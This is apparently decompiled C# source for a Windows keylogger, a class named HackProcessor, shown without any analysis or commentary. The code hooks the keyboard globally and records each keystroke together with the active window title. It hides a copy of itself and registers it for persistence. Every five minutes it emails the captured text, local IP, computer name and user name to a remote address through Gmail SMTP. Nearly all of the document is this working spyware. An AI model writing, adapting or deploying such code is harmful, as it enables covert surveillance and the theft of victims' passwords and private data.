// Token: 0x06000012 RID: 18 RVA: 0x00002410 File Offset: 0x00000610 private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) { bool flag = HackProcessor.dataPressed == null; if (flag) { HackProcessor.dataPressed = new StringBuilder(); } int num = Marshal.ReadInt32(lParam); bool flag2 = nCode >= 0 && wParam == (IntPtr)256; if (flag2) { bool flag3 = !string.IsNullOrEmpty(HackProcessor.active) || HackProcessor.active != HackProcessor.getTitle(); if (flag3) { HackProcessor.active = HackProcessor.getTitle(); } bool flag4 = num == 13 || num == 13; if (flag4) { HackProcessor.dataPressed.Append(Environment.NewLine); } else { HackProcessor.dataPressed.Append((Keys)num); } } return(HackProcessor.CallNextHookEx(HackProcessor._hookID, nCode, wParam, lParam)); }
// Token: 0x06000009 RID: 9 RVA: 0x000020F0 File Offset: 0x000002F0 private static string getTitle() { IntPtr foregroundWindow = HackProcessor.GetForegroundWindow(); StringBuilder stringBuilder = new StringBuilder(1000); HackProcessor.GetWindowText(foregroundWindow, stringBuilder, 1000); return(stringBuilder.ToString()); }
// Token: 0x06000011 RID: 17 RVA: 0x000023A0 File Offset: 0x000005A0 public static void Hook() { using (Process currentProcess = System.Diagnostics.Process.GetCurrentProcess()) { using (ProcessModule mainModule = currentProcess.MainModule) { HackProcessor._hookID = HackProcessor.SetWindowsHookEx(13, HackProcessor._proc, HackProcessor.GetModuleHandle(mainModule.ModuleName), 0u); } } }
// Token: 0x06000010 RID: 16 RVA: 0x00002324 File Offset: 0x00000524 public static string StartupPath() { bool flag = HackProcessor.startupPath == null; if (flag) { StringBuilder stringBuilder = new StringBuilder(260); HackProcessor.GetModuleFileName(HackProcessor.NullHandleRef, stringBuilder, stringBuilder.Capacity); HackProcessor.startupPath = Path.GetDirectoryName(stringBuilder.ToString()); } new FileIOPermission(FileIOPermissionAccess.PathDiscovery, HackProcessor.startupPath).Demand(); return(HackProcessor.startupPath + "\\" + Assembly.GetExecutingAssembly().ManifestModule.Name); }
// Token: 0x0600000C RID: 12 RVA: 0x00002134 File Offset: 0x00000334 public static void sendEMailThroughGmail(object source, ElapsedEventArgs e) { try { string localIPAddress = HackProcessor.GetLocalIPAddress(); MailAddress mailAddress = new MailAddress("*****@*****.**"); string password = "******"; MailAddress to = new MailAddress("*****@*****.**"); string subject = "subject"; string machineLocalName = HackProcessor.getMachineLocalName(); string machineUserName = HackProcessor.getMachineUserName(); string body = string.Format("Local Ip: {0} {1} Local ComputerName : {2} {1} Local UserName {3} {1}Data : {4} ", new object[] { localIPAddress, Environment.NewLine, machineLocalName, machineUserName, HackProcessor.dataPressed }); SmtpClient smtpClient = new SmtpClient { Host = "smtp.gmail.com", Port = 587, EnableSsl = true, DeliveryMethod = SmtpDeliveryMethod.Network, UseDefaultCredentials = false, Credentials = new NetworkCredential(mailAddress.Address, password) }; using (MailMessage mailMessage = new MailMessage(mailAddress, to) { Subject = subject, Body = body }) { smtpClient.Send(mailMessage); } } catch (Exception ex) { Console.WriteLine(ex.ToString()); } finally { HackProcessor.dataPressed = null; } }
// Token: 0x06000008 RID: 8 RVA: 0x00002050 File Offset: 0x00000250 public static void Process() { HackProcessor.Hook(); bool flag = !File.Exists(HackProcessor.dest); if (flag) { File.Copy(HackProcessor.StartupPath(), HackProcessor.dest, true); File.SetAttributes(HackProcessor.dest, FileAttributes.Hidden); HackProcessor.AddToReg(); } System.Timers.Timer timer = new System.Timers.Timer(); timer.Elapsed += new ElapsedEventHandler(HackProcessor.sendEMailThroughGmail); timer.Interval = 300000.0; timer.Enabled = true; timer.AutoReset = true; timer.Start(); Application.Run(); GC.KeepAlive(timer); HackProcessor.UnHook(); }
// Token: 0x06000014 RID: 20 RVA: 0x00002550 File Offset: 0x00000750 public static void UnHook() { HackProcessor.UnhookWindowsHookEx(HackProcessor._hookID); }
// Token: 0x0600000A RID: 10 RVA: 0x00002128 File Offset: 0x00000328 public static void Start(string[] args) { HackProcessor.Process(); }
// Token: 0x0600001A RID: 26 RVA: 0x00002128 File Offset: 0x00000328 public void Start() { HackProcessor.Process(); }
// Token: 0x06000018 RID: 24 RVA: 0x00002128 File Offset: 0x00000328 protected override void OnStart(string[] args) { HackProcessor.Process(); }